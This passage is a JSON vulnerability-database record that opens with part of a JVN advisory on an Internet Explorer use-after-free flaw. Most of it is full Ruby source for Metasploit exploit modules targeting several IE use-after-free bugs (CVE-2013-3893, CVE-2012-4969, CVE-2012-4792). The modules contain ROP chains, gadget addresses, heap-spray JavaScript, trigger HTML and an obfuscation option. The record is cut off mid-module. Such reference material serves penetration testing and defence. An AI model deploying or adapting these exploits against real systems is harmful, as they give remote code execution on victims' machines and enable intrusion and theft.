following workarounds may mitigate the affects of this vulnerability. \n\n\n * Apply [Fix it 51001](<https://support.microsoft.com/kb/2887505>)\n * Apply [Enhanced Mitigation Experience Toolkit (EMET)](<https://support.microsoft.com/kb/2458544/en>)\n * Restrict the execution of ActiveX control and Active Script\nFor more information, please see \"[Suggested Actions](<http://technet.microsoft.com/en-us/security/advisory/2887505#section6>)\" of Microsoft Security Advisory (2887505). \n\n\n ## Products Affected\n\n * Microsoft Internet Explorer 6.0\n * Windows Internet Explorer 7\n * Windows Internet Explorer 8\n * Windows Internet Explorer 9\n * Internet Explorer 10 \n * Internet Explorer 11\n", "modified": "2013-10-17T00:00:00", "published": "2013-09-19T00:00:00", "id": "JVN:27443259", "href": "http://jvn.jp/en/jp/JVN27443259/index.html", "title": "JVN#27443259: Internet Explorer vulnerable to arbitrary code execution", "type": "jvn", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-02-20T20:54:52", "bulletinFamily": "exploit", "description": "This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventuall this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.\n", "modified": "2020-02-18T14:58:30", "published": "2013-09-29T23:24:13", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_SETMOUSECAPTURE_UAF", "href": "", "type": "metasploit", "title": "MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free\",\n 'Description' => %q{\n This module exploits a use-after-free vulnerability that currents targets Internet\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\n It was initially found in the wild in Japan, but other regions such as English,\n Chinese, Korean, etc, were targeted as well.\n\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\n reference during an event. An attacker first can setup two elements, where the second\n is the child of the first, and then setup a onlosecapture event handler for the parent\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\n one for the parent element, one for the child. When the setCapture() call for the child\n element is called, it finally triggers the event, which allows the attacker to cause an\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\n memory. The exact size of this memory may differ based on the version of IE. After the\n free, an invalid reference will still be kept and pass on to more functions, eventuall\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\n code execution) when this function attempts to use this reference to call what appears to\n be a PrivateQueryInterface due to the offset (0x00).\n\n To mimic the same exploit found in the wild, this module will try to use the same DLL\n from Microsoft Office 2007 or 2010 to leverage the attack.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild first spotted in Japan\n 'sinn3r', # Metasploit (thx binjo for the heads up!)\n 'Rich Lundeen' # IE8 windows xp\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3893' ],\n [ 'OSVDB', '97380' ],\n [ 'MSB', 'MS13-080' ],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ],\n [ 'URL', 'https://blog.rapid7.com/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ]\n ],\n 'Platform' => 'win',\n 'BrowserRequirements' =>\n {\n :ua_name => HttpClients::IE,\n :source => /script/i\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [\n 'Windows 7 with Office 2007|2010',\n {\n :os_name => 'Windows 7',\n :ua_ver => \"9.0\",\n :office => /2007|2010/\n }\n ],\n [\n 'Windows XP with IE 8',\n {\n :os_name => 'Windows XP',\n :ua_ver => \"8.0\"\n }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000\n },\n 'DefaultOptions' =>\n {\n 'PrependMigrate' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Privileged' => false,\n 'DisclosureDate' => \"Sep 17 2013\",\n 'DefaultTarget' => 0))\n end\n\n def junk\n return rand_text_alpha(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(target_info)\n code = payload.encoded\n rop = ''\n alignment = ''\n\n case target_info[:office]\n when '2007'\n alignment =\n [\n junk, # Alignment\n ].pack(\"V*\")\n\n rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })\n\n when '2010'\n alignment =\n [\n # 4 dword junks due to the add esp in stack pivot\n junk,\n junk,\n junk,\n junk,\n 0x51bf518b, # ret\n junk # due to the ret 4 on the stack pivot\n ].pack(\"V*\")\n\n rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })\n end\n\n p = alignment + rop + code\n p\n end\n\n def get_exploit_html_ie9(cli, target_info)\n gadgets = {}\n case target_info[:office]\n when '2007'\n gadgets[:spray1] = 0x1af40020\n\n # 0x31610020-0xc4, pointer to gadgets[:call_eax]\n gadgets[:target] = 0x3160ff5c\n\n # mov eax, [esi]\n # push esi\n # call [eax+4]\n gadgets[:call_eax] = 0x51bd1ce8\n\n # xchg eax,esp\n # add byte [eax], al\n # pop esi\n # mov [edi+23c], ebp\n # mov [edi+238], ebp\n # mov [edi+234], ebp\n # pop ebp\n # pop ebx\n # ret\n gadgets[:pivot] = 0x51be4418\n\n when '2010'\n gadgets[:spray1] = 0x1a7f0020\n\n # 0x30200020-0xc4, pointer to gadgets[:call_eax]\n gadgets[:target] = 0x301fff5c\n\n # mov eax, [esi]\n # push esi\n # call [eax+4]\n gadgets[:call_eax] = 0x51bd1a41\n\n # xchg eax,esp\n # add eax,dword ptr [eax]\n # add esp,10\n # mov eax,esi\n # pop esi\n # pop ebp # retn 4\n gadgets[:pivot] = 0x51c00e64\n end\n\n p1 =\n [\n gadgets[:target], # Target address\n gadgets[:pivot] # stack pivot\n ].pack(\"V*\")\n\n p1 << get_payload(target_info)\n\n # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)\n p2 = [ gadgets[:call_eax] ].pack(\"V*\")\n\n js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\"))\n js_p1 = Rex::Text.to_unescape(p1)\n js_p2 = Rex::Text.to_unescape(p2)\n\n %Q|\n<html>\n<script>\n#{js_property_spray}\n\nfunction loadOffice() {\n try{location.href='ms-help://'} catch(e){}\n}\n\nvar a = new Array();\nfunction spray() {\n var obj = '';\n for (i=0; i<20; i++) {\n if (i==0) { obj += unescape(\"#{js_s1}\"); }\n else { obj += \"\\\\u4242\\\\u4242\"; }\n }\n obj += \"\\\\u5555\";\n\n for (i=0; i<10; i++) {\n var e = document.createElement(\"div\");\n e.className = obj;\n a.push(e);\n }\n\n var s1 = unescape(\"#{js_p1}\");\n sprayHeap({shellcode:s1, maxAllocs:0x300});\n var s2 = unescape(\"#{js_p2}\");\n sprayHeap({shellcode:s2, maxAllocs:0x300});\n}\n\nfunction hit()\n{\n var id_0 = document.createElement(\"sup\");\n var id_1 = document.createElement(\"audio\");\n\n document.body.appendChild(id_0);\n document.body.appendChild(id_1);\n id_1.applyElement(id_0);\n\n id_0.onlosecapture=function(e) {\n document.write(\"\");\n spray();\n }\n\n id_0['outerText']=\"\";\n id_0.setCapture();\n id_1.setCapture();\n}\n\nfor (i=0; i<20; i++) {\n document.createElement(\"frame\");\n}\n\nwindow.onload = function() {\n loadOffice();\n hit();\n}\n</script>\n</html>\n |\n end\n\n def get_exploit_html_ie8(cli, target_info)\n code = payload.encoded\n\n #address containing our heap spray is 0x20302020\n spray_addr = \"\\\\u2024\\\\u2030\"\n\n #size to fill after free is 0x50\n free_fill = spray_addr + \"\\\\u2424\" * (((0x50-1)/2)-2)\n\n rop = [\n 0x77c3868a, # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret ;\n 0x20302020 # pointer to stack pivot\n ].pack(\"V*\")\n\n rop << generate_rop_payload('msvcrt', code, { 'target'=>'WINDOWS XP SP3' }) << code\n\n js_rop = Rex::Text.to_unescape(rop)\n\n %Q|\n<html>\n<script>\n\n#{js_property_spray}\n\ntt = new Array(30);\n\nfunction trigger()\n{\n var id_0 = document.createElement(\"sup\");\n var id_1 = document.createElement(\"audio\");\n\n document.body.appendChild(id_0);\n document.body.appendChild(id_1);\n id_1.applyElement(id_0);\n\n id_0.onlosecapture=function(e) {\n document.write(\"\");\n\n for(i = 0; i < tt.length; i++) {\n tt[i] = document.createElement('div');\n tt[i].className =\"#{free_fill}\";\n }\n\n var s = unescape(\"#{js_rop}\");\n sprayHeap({shellcode:s});\n }\n\n id_0['outerText']=\"\";\n id_0.setCapture();\n id_1.setCapture();\n}\n\nwindow.onload = function() {\n trigger();\n}\n</script>\n |\n\n end\n\n def on_request_exploit(cli, request, target_info)\n case target_info[:ua_ver]\n when \"8.0\"\n html = get_exploit_html_ie8(cli, target_info)\n when \"9.0\"\n html = get_exploit_html_ie9(cli, target_info)\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n\n end\nend\n\n=begin\n\nhxds.dll (Microsoft\u00ae Help Data Services Module)\n\n 2007 DLL info:\n ProductVersion: 2.05.50727.198\n FileVersion: 2.05.50727.198 (QFE.050727-1900)\n\n 2010 DLL info:\n ProductVersion: 2.05.50727.4039\n FileVersion: 2.05.50727.4039 (QFE.050727-4000)\n\nmshtml.dll\n\n WinXP IE8 DLL info:\n ProductVersion: 8.0.6001.18702\n FileVersion: 8.0.6001.18702\n FileDescription: Microsoft (R) HTML Viewer\n\n Win7 IE9 DLL info:\n ProductVersion: 9.00.8112.16446\n FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)\n FileDescription: Microsoft (R) HTML Viewer\n\n\n0:005> r\neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34\neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nMSHTML!CTreeNode::GetInterface+0xd8:\n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????\n\n\n66e13df7 8b0e mov ecx,dword ptr [esi]\n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000)\n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]\n66e13e01 ffd0 call eax\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_setmousecapture_uaf.rb"}, {"lastseen": "2019-12-26T14:12:08", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012. Also note that presently, this module has some target dependencies for the ROP chain to be valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which is often the case).\n", "modified": "2017-10-05T21:44:36", "published": "2012-09-17T15:54:12", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_EXECCOMMAND_UAF", "href": "", "type": "metasploit", "title": "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"7.0\",\n :ua_maxver => \"9.0\",\n :javascript => true,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability \",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When\n rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,\n but the same memory is reused again later in the CMshtmlEd::Exec() function, leading\n to a use-after-free condition.\n\n Please note that this vulnerability has been exploited in the wild since Sep 14 2012.\n\n Also note that presently, this module has some target dependencies for the ROP chain to be\n valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).\n For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which\n is often the case).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'unknown', # via ZDI\n 'eromang', # First public discovery\n 'binjo',\n 'sinn3r', # Metasploit\n 'juan vazquez' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4969' ],\n [ 'OSVDB', '85532' ],\n [ 'MSB', 'MS12-063' ],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2757760' ],\n [ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ]\n ],\n 'Payload' =>\n {\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],\n [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],\n [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fc', 'Random' => true } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Sep 14 2012\", # When it was spotted in the wild by eromang\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n vprint_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\")[0].to_i\n end\n\n def nop\n return make_nops(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n # No rop. Just return the payload.\n return code if t['Rop'].nil?\n\n # Both ROP chains generated by mona.py - See corelan.be\n case t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n exec_size = code.length\n stack_pivot = [\n 0x77c4e393, # RETN\n 0x77c4e392, # POP EAX # RETN\n 0x77c15ed5, # XCHG EAX, ESP # RETN\n ].pack(\"V*\")\n rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\n\n else\n print_status(\"Using JRE ROP\")\n exec_size = 0xffffffff - code.length + 1\n if t['Random']\n stack_pivot = [\n 0x0c0c0c0c, # 0c0c0c08\n 0x7c347f98, # RETN\n 0x7c347f97, # POP EDX # RETN\n 0x7c348b05 # XCHG EAX, ESP # RET\n ].pack(\"V*\")\n else\n stack_pivot = [\n 0x7c347f98, # RETN\n 0x7c347f97, # POP EDX # RETN\n 0x7c348b05 # XCHG EAX, ESP # RET\n ].pack(\"V*\")\n end\n rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\n end\n\n return rop_payload\n end\n\n # Spray published by corelanc0d3r\n # Exploit writing tutorial part 11 : Heap Spraying Demystified\n # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\n def get_random_spray(t, js_code, js_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n\n spray = <<-JS\n\n function randomblock(blocksize)\n {\n var theblock = \"\";\n for (var i = 0; i < blocksize; i++)\n {\n theblock += Math.floor(Math.random()*90)+10;\n }\n return theblock;\n }\n\n function tounescape(block)\n {\n var blocklen = block.length;\n var unescapestr = \"\";\n for (var i = 0; i < blocklen-1; i=i+4)\n {\n unescapestr += \"%u\" + block.substring(i,i+4);\n }\n return unescapestr;\n }\n\n var heap_obj = new heapLib.ie(0x10000);\n\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n\n while (nops.length < 0x80000) nops += nops;\n\n var offset_length = #{t['Offset']};\n\n for (var i=0; i < 0x1000; i++) {\n var padding = unescape(tounescape(randomblock(0x1000)));\n while (padding.length < 0x1000) padding+= padding;\n var junk_offset = padding.substring(0, offset_length);\n var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\n heap_obj.alloc(sprayblock);\n }\n\n JS\n\n return spray\n end\n\n def get_spray(t, js_code, js_nops)\n randnop = rand_text_alpha(rand(100) + 1)\n\n js = <<-JS\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n\n while (nops.length < 0x80000) nops += nops;\n var offset = nops.substring(0, #{t['Offset']});\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\n\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n\n heap_obj.gc();\n\n for (var i=1; i < 0x300; i++) {\n heap_obj.alloc(block);\n }\n JS\n end\n\n\n def load_html1(cli, my_target)\n p = get_payload(my_target, cli)\n\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\n js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\n\n if my_target['Random']\n js = get_random_spray(my_target, js_code, js_r_nops)\n else\n js = get_spray(my_target, js_code, js_nops)\n end\n\n js = heaplib(js, {:noobfu => true})\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n html = %Q|\n <html>\n <body>\n <script>\n var arrr = new Array();\n arrr[0] = window.document.createElement(\"img\");\n arrr[0][\"src\"] = \"#{Rex::Text.rand_text_alpha(1)}\";\n </script>\n\n <iframe src=\"#{this_resource}/#{@html2_name}\"></iframe>\n <script>\n #{js}\n </script>\n </body>\n </html>\n |\n\n return html\n end\n\n def load_html2\n html = %Q|\n <HTML>\n <script>\n function funcB() {\n document.execCommand(\"selectAll\");\n };\n\n function funcA() {\n document.write(\"#{Rex::Text.rand_text_alpha(1)}\");\n parent.arrr[0].src = \"YMjf\\\\u0c08\\\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH\";\n }\n\n </script>\n <body onload='funcB();' onselect='funcA()'>\n <div contenteditable='true'>\n a\n </div>\n </body>\n </HTML>\n |\n\n return html\n end\n\n def this_resource\n r = get_resource\n return ( r == '/') ? '' : r\n end\n\n def on_request_uri(cli, request)\n uri = request.uri\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n vprint_status(\"Requesting: #{uri}\")\n print_status(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"Browser not supported, sending a 404: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n if uri =~ /#{@html2_name}/\n print_status(\"Loading #{@html2_name}\")\n html = load_html2\n elsif uri =~ /#{@html1_name}/\n print_status(\"Loading #{@html1_name}\")\n html = load_html1(cli, my_target)\n elsif uri =~ /\\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)\n print_status(\"Redirecting to #{@html1_name}\")\n send_redirect(cli, \"#{this_resource}/#{@html1_name}\")\n return\n else\n send_not_found(cli)\n return\n end\n\n html = html.gsub(/^ {4}/, '')\n\n send_response(cli, html, {'Content-Type'=>'text/html'})\n\n end\n\n def exploit\n @html1_name = \"#{Rex::Text.rand_text_alpha(5)}.html\"\n @html2_name = \"#{Rex::Text.rand_text_alpha(6)}.html\"\n super\n end\nend\n\n\n=begin\n0:008> r\neax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08\neip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nmshtml!CMshtmlEd::Exec+0x134:\n637d464e 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????\n\n0:008> u\nmshtml!CMshtmlEd::Exec+0x134:\n637d464e 8b07 mov eax,dword ptr [edi]\n637d4650 57 push edi\n637d4651 ff5008 call dword ptr [eax+8]\n\n0:008> k\nChildEBP RetAddr\n020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134\n020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6\n020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91\n020bc298 638ee2a9 mshtml!CDocument::Exec+0x24\n020bc2c0 638b167b mshtml!CBase::execCommand+0x50\n020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93\n020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149\n020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1\n020bc410 63643832 mshtml!CBase::InvokeEx+0x25\n020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b\n020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1\n020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20\n020bc520 633a6d37 mshtml!PlainInvokeEx+0xea\n020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\n020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\n020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98\n020bc690 633a77ff jscript!VAR::InvokeByName+0x135\n020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\n020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce\n020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_execcommand_uaf.rb"}, {"lastseen": "2020-01-27T21:20:40", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.\n", "modified": "2017-07-24T13:26:21", "published": "2012-12-31T06:29:19", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF", "href": "", "type": "metasploit", "title": "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"8.0\",\n # :ua_maxver => \"8.0\",\n # :javascript => true,\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => GoodRanking\n #})\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CButton object is freed, but a reference\n is kept and used again during a page reload, an invalid memory that's controllable\n is used, and allows arbitrary code execution under the context of the user.\n\n Please note: This vulnerability has been exploited in the wild targeting\n mainly China/Taiwan/and US-based computers.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'eromang',\n 'mahmud ab rahman',\n 'juan vazquez', #Metasploit\n 'sinn3r', #Metasploit\n 'Peter Vreugdenhil' #New trigger & new exploit technique\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4792' ],\n [ 'OSVDB', '88774' ],\n [ 'US-CERT-VU', '154201' ],\n [ 'BID', '57070' ],\n [ 'MSB', 'MS13-008' ],\n [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\n [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],\n [ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Dec 27 2012\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\")[0].to_i\n end\n\n def nop\n return make_nops(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n # No rop. Just return the payload.\n return code if t['Rop'].nil?\n\n # Make post code execution more stable\n code << rand_text_alpha(12000)\n\n msvcrt_align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n java_align = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n\n rop_payload = ''\n\n case t['Rop']\n when :msvcrt\n case t.name\n when 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})\n when 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, 